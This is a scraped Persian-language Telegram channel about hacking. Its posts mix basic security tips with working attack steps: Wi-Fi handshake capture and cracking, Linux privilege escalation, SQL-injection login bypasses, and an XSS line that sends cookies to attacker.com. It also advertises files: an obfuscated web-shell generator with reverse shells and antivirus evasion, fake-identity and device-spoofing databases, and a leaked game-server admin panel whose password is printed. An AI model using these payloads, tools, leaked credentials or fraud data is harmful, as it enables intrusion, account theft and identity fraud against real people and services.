Spire Team
5.1K subscribers
72 photos
3 videos
92 files
187 links
> 🛡️ Ethical Hacking | Cyber Security
پاینده ایران و ایرانی
💻 Learn • Practice • Secure
🔐 Ethical & Educational Content Only
✅ We respect and follow Telegram's rules
🚫 No illegal or unauthorized activities
👤 @durov
Download Telegram
هش کردن متن، چرا برگشت‌ناپذیره

هش یه تابع ریاضیه که ورودی رو می‌گیره، خروجی ثابت میده.

echo -n "hello" | sha256sum

خروجی:
2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824

حالا بذار "hello1" رو هش کن:

echo -n "hello1" | sha256sum

خروجی:
ce06092c04b6e91d7d7dc82c05e1a6e3e5a4f3a4c4f9e9f4b6c6b1a2c8d8e8f9

ببین چقدر فرق کرد؟ فقط با یه کاراکتر اضافه.

چرا برگشت‌ناپذیره؟

چون هش اطلاعات رو فشرده می‌کنه، بخشی از داده گم میشه.
از خروجی نمی‌تونی ورودی رو بازسازی کنی.

ولی یه راه هست: Brute Force
همه ترکیب‌ها رو امتحان کنی تا یکی مطابقت کنه.

برای همینم پسوردها رو هش می‌کنن. حتی اگه دیتابیس لو بره، پسورد مستقیم لو نمیره.

البته اگه پسوردت ضعیف باشه، تو چند دقیقه کرک میشه.

#ℳℴ𝒷𝒾𝓃
❤2
مخفی کردن متن داخل عکس

این تکنیک اسمش Steganography هست.
یعنی اطلاعات رو جایی پنهان کنی که کسی شک نکنه.

ساده‌ترین روش: چسبوندن به آخر فایل عکس.

cat secret.txt >> image.jpg

حالا عکس رو باز کن. کاملاً سالمه، هیچ تغییری نمی‌بینی.
ولی متن داخلشه.

برای استخراج:

strings image.jpg | tail

می‌بینی که متن آخرشه.

چرا کاربردی؟

وقتی می‌خوای یه فایل رو بفرستی بدون اینکه کسی بفهمه.
یا وقتی می‌خوای داخل یه شبکه، داده قايم کنی.

نکته مهم:

این روش خیلی ساده‌ست و با یه نگاه به حجم فایل لو می‌ره.
اگه فایل عکس ۵۰ کیلوبایتی، ۲۰۰ کیلوبایت بشه، هر کسی شک می‌کنه.

روش‌های حرفه‌ای‌تر، بیت‌های آخر پیکسل‌ها رو تغییر میدن.
چشم انسان نمی‌بینه، ولی فایل سالم می‌مونه.

#ℳℴ𝒷𝒾𝓃
❤2
ساخت پسورد رندوم قوی با یه دستور

به جای اینکه خودت پسورد بسازی و فکر کنی قویه، بذار سیستم بسازه.

openssl rand -base64 16

خروجی مثلاً:
Kj8sL2mPqR5vX9wN

۲۲ کاراکتر، کاملاً رندوم، غیرقابل حدس.

چرا از openssl؟

چون از منبع رندوم سیستم عامل استفاده می‌کنه، نه یه الگوریتم ساده.
پس پیش‌بینی‌پذیر نیست.

اگه می‌خوای حتی قوی‌تر باشه:

openssl rand -base64 32

۴۴ کاراکتر. برای کلیدهای رمزنگاری یا API Key عالیه.

نکته:

هیچ‌وقت از پسوردهای تولیدی برای همه سایت‌ها استفاده نکن.
برای هر سرویس، یه پسورد جدا بساز.

و اگه می‌خوای مدیریتش کنی، از یه Password Manager استفاده کن.
نه از فایل تکست یا دفترچه.

#ℳℴ𝒷𝒾𝓃
❤1
پیدا کردن فایل‌های حجیم روی سیستم

وقتی هاردت پر میشه، معمولاً نمی‌دونی چی فضا رو خورده.

find / -type f -size +100M 2>/dev/null

این خط می‌ره کل سیستم رو می‌گرده، هر فایلی بالای ۱۰۰ مگ رو نشون میده.

چرا 2>/dev/null؟

چون find خیلی جاها دسترسی نداره و ارور میده.
این بخش، ارورها رو می‌فرسته به سیاه‌چال.

نسخه حرفه‌ای‌تر:

find / -type f -size +100M -exec ls -lh {} \; 2>/dev/null | awk '{ print $5, $9 }'

حالا حجم و مسیر فایل رو کنار هم می‌بینی.

کاربرد دیگه:

توی تست نفوذ، گاهی دنبال فایل‌های بکاپ می‌گردی.
همین دستور رو با ۱۰M اجرا کن، شاید یه backup.sql گیرت بیاد.

#ℳℴ𝒷𝒾𝓃
❤2
مانیتور زنده اتصالات شبکه

می‌خوای ببینی همین الان سیستم‌ت به کجا وصله؟

watch -n1 "netstat -tunap | grep ESTABLISHED"

چیکار می‌کنه؟

هر ثانیه لیست اتصالات فعال رو نشون میده.
grep ESTABLISHED فقط اتصالات برقرار شده رو فیلتر می‌کنه.

خروجی چطوریه؟

یه لیست از IP و پورت‌ها.
ستون آخر، اسم برنامه‌ایه که اتصال رو باز کرده.

چرا مهمه؟

اگه یه برنامه مشکوک ببینی که به IP ناشناس وصله، یعنی یه جای کار می‌لنگه.
ممکنه یه بدافزار در حال ارسال داده باشه.

نسخه به‌روزتر با ss:

watch -n1 "ss -tunap | grep ESTAB"

ss جدیدتره، سریع‌تره، و روی سیستم‌های مدرن بهتر کار می‌کنه.

نکته امنیتی:

اگه دیدی یه پروسه‌ای مرتب به یه IP خارجی وصل میشه و نمی‌شناسیش،
PID رو بردار و با ps برو ببین چیه.

#ℳℴ𝒷𝒾𝓃
❤2
هدرهای امنیتی که هر سایتی باید داشته باشه

وقتی یه سایت باز می‌کنی، سرور یه سری هدر می‌فرسته که مرورگرت رفتارش رو تنظیم کنه.

چک کردنشون خیلی راحته:

curl -I https://example.com

خروجی رو نگاه کن، اینا باید باشن:

X-Frame-Options: DENY
یعنی سایت تو iframe باز نشه. جلوی Clickjacking رو می‌گیره.

X-Content-Type-Options: nosniff
یعنی مرورگر نوع فایل رو حدس نزنه.

Strict-Transport-Security: max-age=31536000
یعنی مرورگر همیشه از HTTPS استفاده کنه.

Content-Security-Policy: default-src 'self'
یعنی فقط اسکریپت‌های خود سایت اجرا بشن.

اگه اینا نبودن چی؟

سایت آسیب‌پذیره. می‌تونه هدف XSS، Clickjacking، یا MITM باشه.

ابزار سریع برای چک:

curl -s -D - https://example.com -o /dev/null | grep -i "x-frame\|strict\|content-security"

#ℳℴ𝒷𝒾𝓃
❤3
OSINT چیه و چرا اولین قدم هر عملیاته

قبل از اینکه به چیزی حمله کنی، باید بدونی طرف چیه.
OSINT یعنی جمع‌آوری اطلاعات از منابع عمومی.

سه تا منبع طلایی:

۱. whois
whois example.com

اسم صاحب دامنه، ایمیل، شماره تلفن، تاریخ ثبت.
اگه حریم خصوصی فعال نباشه، همه چی لو میره.

۲. crt.sh
برو به crt.sh و دامنه رو سرچ کن.
همه زیردامنه‌های ثبت‌شده رو نشون میده.
این یه معدن طلاست برای پیدا کردن پنل‌های مخفی.

۳. Shodan
موتور جستجوی دستگاه‌هاست، نه سایت‌ها.
می‌تونی سرچ کنی: org:"Target Company"
همه سرورهای اون شرکت با پورت‌های بازشون.

نکته:
هیچ‌وقت با اکانت شخصی‌ت این کارها رو نکن.
یه VM جدا، یه VPN، یه مرورگر جدا.

#ℳℴ𝒷𝒾𝓃
❤3
تفاوت رمزنگاری و هش کردن، یه بار برای همیشه

اکثر مردم این دوتا رو قاطی می‌کنن.
ولی فرقشون مثل فرق قفل و چرخ‌گوشته.

رمزنگاری:
ورودی رو می‌گیری، با کلید قفلش می‌کنی.
با همون کلید بازش می‌کنی.
برگشت‌پذیره.

هش:
ورودی رو می‌گیری، یه خروجی ثابت می‌گیری.
هیچ کلیدی نیست.
برگشت‌ناپذیره.

پس کِی از کدوم استفاده کنیم؟

رمزنگاری: برای داده‌ای که بعداً باید بخونیم.
مثل فایل، پیام، دیتابیس.

هش: برای داده‌ای که فقط باید چک کنیم.
مثل پسورد، امضای دیجیتال، بلاک‌چین.

چرا پسورد رو هش می‌کنن نه رمزنگاری؟

چون اگه رمزنگاری کنن، کلید کجاست؟
اگه کلید لو بره، همه پسوردها لو میره.

ولی هش، حتی اگه دیتابیس لو بره، پسورد مستقیم لو نمیره.
مگر اینکه پسورد ضعیف باشه و کرک بشه.

#ℳℴ𝒷𝒾𝓃
❤5
حمله به وای‌فای، همون چیزی که تو فیلم‌ها می‌بینی

همه فکر می‌کنن هک وای‌فای یعنی کرک کردن پسورد.
ولی داستان چیز دیگه‌ایه.

وای‌فای با WPA2 رمزنگاری میشه.
پسورد رو نمی‌تونی مستقیم بخونی.
ولی می‌تونی Handshake رو بگیری.

Handshake چیه؟

وقتی یه دستگاه به وای‌فای وصل میشه، یه تبادل رمزنگاری شده انجام میشه.
این تبادل، شامل پسورد هش شده‌ست.

مراحل:

۱. بری تو حالت مانیتور
airmon-ng start wlan0

۲. شبکه‌ها رو ببینی
airodump-ng wlan0mon

۳. هندشیک بگیری
airodump-ng -c 6 --bssid MAC -w capture wlan0mon

۴. با Deauth، دستگاه رو قطع کنی تا دوباره وصل شه
aireplay-ng -0 5 -a MAC wlan0mon

۵. حالا یه فایل capture داری که هندشیک توشه.

۶. با wordlist کرکش کنی
aircrack-ng -w rockyou.txt capture-01.cap

نکته:
اگه پسورد قوی باشه، این روش هیچ‌وقت جواب نمیده.
پسورد ۱۲ کاراکتری رندوم، میلیون‌ها سال طول می‌کشه.

#ℳℴ𝒷𝒾𝓃
❤5
بالا رفتن سطح دسترسی در لینوکس، مرحله به مرحله

فرض کن یه شل معمولی گرفتی. user عادی هستی.
حالا باید root بشی.

اولین چک:

sudo -l

این دستور می‌گه چه دستوراتی رو می‌تونی با sudo اجرا کنی.
بعضی وقتا یه دستور ساده مثل find یا vim اینجاست که می‌تونی ازش سوءاستفاده کنی.

مثال:

اگه sudo -l نشون داد:
(ALL) NOPASSWD: /usr/bin/find

می‌تونی این رو بزنی:
sudo find . -exec /bin/sh \; -quit

حالا root هستی.

چک دوم: فایل‌های SUID

find / -perm -4000 -type f 2>/dev/null

این فایل‌ها با دسترسی root اجرا میشن.
بعضیاشون آسیب‌پذیرن.

چک سوم: کرون‌جاب‌ها

cat /etc/crontab
ls -la /etc/cron.*

اگه یه اسکریپت با دسترسی root اجرا میشه و تو می‌تونی نوشتش کنی،
فقط یه خط بهش اضافه کن که یه شل بهت بده.

چک چهارم: فایل‌های قابل نوشتن

find / -writable -type f 2>/dev/null | grep -v proc

اگه تونستی یه فایل مهم رو ویرایش کنی، راه برای root شدن بازه.

#ℳℴ𝒷𝒾𝓃
❤4
حمله به فرم لاگین، چرا پسورد مهم نیست

اکثر هکرهای مبتدی فکر می‌کنن باید پسورد رو کرک کنن.
ولی حرفه‌ای‌ها سراغ خود فرم نمی‌رن.

مثال:

یه فرم لاگین ساده:
username: admin
password: any

چک کن اگه فقط یوزرنیم رو بذاری چی میشه.
بعضی فرم‌ها فقط یوزرنیم چک می‌کنن.

یا:
username: admin'--
password: any

اگه دیتابیس MySQL باشه، این کوئری اجرا میشه:
SELECT * FROM users WHERE username='admin'--' AND password='any'

تو کامنت --، بقیه کوئری نادیده گرفته میشه.
پسورد اصلاً چک نمیشه.

یا:
username: admin
password: ' OR '1'='1

کوئری میشه:
SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1'

چون 1=1 همیشه درسته، همه رکوردها برمی‌گردن.
وارد میشی.

یا:
username: admin
password: ' OR 1=1 LIMIT 1--

حالا فقط اولین کاربر برمی‌گرده.

نکته:
همه اینا به شرطیه که سایت از Prepared Statement استفاده نکنه.
اگه استفاده کنه، هیچ‌کدوم کار نمی‌کنه.

#ℳℴ𝒷𝒾𝓃
❤5
XSS چیه و چرا خطرناکه

XSS یعنی تزریق جاوااسکریپت به صفحه‌ای که کاربر دیگه می‌بینه.

سه نوع داره:

۱. Reflected XSS
کد تو URL هست و تو همون لحظه اجرا میشه.
مثال:
example.com/search?q=<script>alert(1)</script>

۲. Stored XSS
کد تو دیتابیس ذخیره میشه و هر کسی صفحه رو باز کنه، اجرا میشه.
مثال: کامنت تو یه وبلاگ.
هر بازدیدکننده، کد رو اجرا می‌کنه.

۳. DOM-based XSS
کد تو جاوااسکریپت خود سایت پردازش میشه.
بدون درخواست به سرور.

چرا خطرناکه؟

چون با یه XSS می‌تونی:
کوکی کاربر رو بدزدی
سشنش رو بربایی
فرم لاگین جعلی نشون بدی
کل صفحه رو تغییر بدی
کی‌لاگر نصب کنی

مثال سرقت کوکی:

<script>new Image().src='//attacker.com?c='+document.cookie</script>

این یه درخواست به سرور هکر می‌فرسته با کوکی قربانی.

دفاع:

همیشه ورودی کاربر رو Encode کن.
از Content-Security-Policy استفاده کن.
کوکی‌ها رو HttpOnly کن.

#ℳℴ𝒷𝒾𝓃
❤4
SSH server Ubuntu.html
10.7 KB
شبیه‌ساز فیک سرور Ubuntu
❤5
Shell 🐚 Generator.html
41.4 KB
Shell Generator 🐚 DarkPacket

یک ابزار، هشت زبان
PHP · ASP · JSP · Node.js · Python · Perl · Ruby · Bash

هر زبان قابلیت‌های مخصوص خودش رو داره — از اجرای فرمان و eval تا شل معکوس، بایند شل، MySQL Dump و Thread Enumeration

پشتیبانی از کلید ساده، MD5 و SHA1 با پارامتر تصادفی

قابلیت‌های پرقدرت: اجرای فرمان · لیست فایل · خواندن/نوشتن · آپلود/دانلود · اطلاعات سرور · کوئری SQL · شل معکوس · بایند شل · زیپ · خودتخریبی · خروجی زنده · کپی یک‌کلیکی · دانلود خودکار با پسوند صحیح · راهنمای هوشمند برای هر زبان · شش لایه مبهم‌سازی Base64 · Hex · XOR · Split · Combo · None برای دور زدن WAF و آنتی‌ویروس
❤6
user-agents-100000.txt
11.9 MB
دیتابیس عظیم و بسیار قدرتمندی که شامل مجموعه‌ای کامل از ۱۰۰ هزار User-Agent سالم، معتبر و به‌روز است.

این پایگاه داده با ارائه طیف وسیعی از شناسه‌های کاربری استاندارد و غیراستاندارد، امکان شبیه‌سازی دقیق ترافیک وب را فراهم می‌کند و برای توسعه‌دهندگان، برنامه‌نویسان و متخصصان امنیت سایبری که نیاز به تست‌های جامع پراکسی، اسکریپت‌نویسی خودکار یا تحلیل رفتار مرورگرها دارند، منبعی ایده‌آل و غنی به شمار می‌رود.
‌
all_ipv4_500ips.zip
210.8 KB
دیتابیس ارائه‌شده شامل مجموعه‌ای بسیار گسترده و جامع از آدرس‌های اینترنتی نسخه چهار (IPv4) است که پوشش‌دهی جغرافیای آن به ۹۵ کشور مختلف در سراسر جهان گسترش دارد.

این پایگاه داده با ارائه اطلاعات دقیق و به‌روز، امکان شناسایی و تحلیل منبع ترافیک از نقاط مختلف جهان را فراهم می‌کند. به‌عنوان یک نمونه از ظرفیت و تنوع این دیتابیس، می‌توان به وجود حداقل ۵۰۰ آدرس IP منحصر‌به‌فرد و فعال برای هر یک از کشورهای ذکرشده اشاره کرد؛ این حجم از داده‌ها نشان‌دهنده عمق و گستردگی پوشش‌دهی شبکه‌ای در سطح بین‌المللی است و برای پروژه‌هایی که نیازمند تحلیل جغرافیایی ترافیک یا مدیریت دسترسی‌ها بر اساس موقعیت مکانی کاربران هستند، ابزاری ارزشمند و کارآمد به شمار می‌رود.
‌
all_ipv6_500ips.zip
551.4 KB
دیتابیس ارائه‌شده شامل مجموعه‌ای بسیار گسترده و جامع از آدرس‌های اینترنتی نسخه چهار (IPv6) است که پوشش‌دهی جغرافیای آن به ۹۲ کشور مختلف در سراسر جهان گسترش دارد.

این پایگاه داده با ارائه اطلاعات دقیق و به‌روز، امکان شناسایی و تحلیل منبع ترافیک از نقاط مختلف جهان را فراهم می‌کند. به‌عنوان یک نمونه از ظرفیت و تنوع این دیتابیس، می‌توان به وجود حداقل ۵۰۰ آدرس IP منحصر‌به‌فرد و فعال برای هر یک از کشورهای ذکرشده اشاره کرد؛ این حجم از داده‌ها نشان‌دهنده عمق و گستردگی پوشش‌دهی شبکه‌ای در سطح بین‌المللی است و برای پروژه‌هایی که نیازمند تحلیل جغرافیایی ترافیک یا مدیریت دسترسی‌ها بر اساس موقعیت مکانی کاربران هستند، ابزاری ارزشمند و کارآمد به شمار می‌رود.
‌
fake_identities_10countries_10cities_100pergender_2026-09-11.zip
15.3 MB
دیتابیس بسیار قوی شامل ۲۰ هزار اطلاعات داینامیک برای هویت جعلی.

۱۰ کشور: ایران، روسیه، آمریکا، آلمان، فرانسه، انگلیس، ژاپن، برزیل، هند، چین.
شهرهای واقعی: تهران، Москва و Los Angeles.

[PERSONAL]: مشخصات فردی
First Name: نام کوچک واقعی بر اساس کشور و جنسیت
Last Name: نام خانوادگی واقعی بر اساس کشور
Full Name: نام کامل
Gender: Male یا Female
Age: بین ۱۸ تا ۲۶ سال
Birth Year: سال تولد
Nationality: نام کشور

[CONTACT]: اطلاعات تماس
Email: ساخته‌شده از نام و فامیل
Phone: شماره با کد کشور، مثلاً +98 912 345 6789
Phone (Raw): شماره بدون فرمت

Street: خیابان و پلاک بر اساس خیابان‌های واقعی هر کشور
City: شهر
Postal Code: با الگوی واقعی هر کشور، مثلاً ایران ۱۰ رقم و آمریکا ۵ رقم
Country: کشور

[NETWORK]: اطلاعات شبکه
IPv4: با پیشوند شبیه کشور، مثلاً 5.x.x.x برای ایران
MAC Address: آدرس مک تصادفی

[MISC]: اطلاعات متفرقه
Username: نام کاربری
Password: رمز عبور تصادفی
Credit Card: شماره کارت ساختگی با پیشوند ۴
IBAN: شماره شبا ساختگی

‌
proxies-1786199678869.txt
59.7 KB
بیش‌از ۱ هزار پروکسی CORS قدرتمند استخراج شده از سایت corsproxy.io
ports.compact.json
822.4 KB
تمام (۶۵۵۳۵) پورت‌های جهان + سرویس ارائه دهنده‌ی آنها در قالب JSON
DigitalIdentityProfiles (1) (1).zip
25.4 MB
مخزن اطلاعات قدرتمند برای جعل اطلاعات

۲۰ کشور، هر کشور ۵ شهر، هر شهر ۳ سرویس‌دهنده IP، هر سرویس ۲۵ دستگاه txt و ۲۵ دستگاه json.
مجموعاً ۱۵ هزار دستگاه به دو فرمت.
panel.html
141.6 KB
پنل دیتابیس سرور بازی امپراتوری پارس
این پنل، توسط کاربر @Net_activenull استخراج و منتشر شده است.

رمز دسترسی به پنل مدیریت:
empire2024

برای افزایش سطح امنیت شبکه و جلوگیری از دسترسی‌های غیرمجاز، این بسته شامل ۲۰۰ عدد پروکسی CORS می‌باشد که امکان استفاده امن و مخفیانه از سرویس‌ها را فراهم می‌کند.

توجه داشته باشید که این محتوا صرفاً با هدف آموزشی و آشنایی با ساختارهای امنیتی ارائه شده است. مسئولیت هرگونه سوءاستفاده، دسترسی غیرمجاز یا استفاده نادرست از این اطلاعات بر عهده کاربر نهایی بوده و هیچ‌گونه ارتباطی با تولیدکنندگان محتوا ندارد.
NLP.html
127.3 KB
ربات قدرتمند Nullspire Ai

قابلیت‌های گسترده و پیشرفته:
- دسترسی نامحدود به ۵۳ API عمومی و معتبر: این ربات با اتصال به منابع اطلاعاتی کلیدی مانند گیت‌هاب (GitHub) برای مدیریت کدها و پروژه‌ها، ویکی‌پدیا (Wikipedia) برای دسترسی به دانش عمومی، و همچنین مجموعه‌ای از سایت‌های تخصصی اطلاعاتی و پایگاه‌های داده، امکان جمع‌آوری و پردازش حجم عظیمی از داده‌ها را فراهم می‌سازد.
- ابزارهای حرفه‌ای OSINT (هوش‌یابی منابع باز): Nullspire Ai مجهز به موتورهای جستجوی هوشمند است که فرآیند جمع‌آوری اطلاعات از منابع باز را به‌شکل خودکار و دقیق تسهیل می‌کند. این قابلیت برای تحلیل‌های عمیق، پایش اخبار و کشف اطلاعات پنهان بسیار مؤثر است.
- شخصی‌سازی بالا و انعطاف‌پذیری: کاربران می‌توانند با تنظیمات دقیق و شخصی‌سازی شده، رفتار ربات را مطابق با نیازهای خاص خود تنظیم کنند تا خروجی‌ها کاملاً متناسب با اهداف آن‌ها باشد.
- قدرت پردازش و سرعت بالا: با پشتیبانی از پردازش هم‌زمان درخواست‌ها و پاسخ‌گویی سریع، Nullspire Ai برای انجام پروژه‌های بزرگ و پیچیده ایده‌آل است.
❤5